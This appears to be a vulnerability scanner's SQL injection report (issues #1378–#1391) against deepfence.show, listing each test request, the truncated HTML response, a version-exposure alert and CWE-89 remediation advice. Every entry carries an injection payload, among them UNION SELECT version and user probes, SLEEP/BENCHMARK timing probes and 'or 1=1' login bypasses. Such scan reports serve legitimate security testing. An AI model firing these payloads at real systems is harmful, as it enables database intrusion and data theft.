https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1378\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)\n+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1379\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# test%20UNION%20select%201,%20@@version,%201,%\n201;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1380\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1381\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or ('1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1382Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(\n500000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1383\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1384\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or \"1\"=\"1\"--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1385\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1386\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or \"\"-\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1387\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1388\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or '1'='1'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1389\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1390\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1391\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" 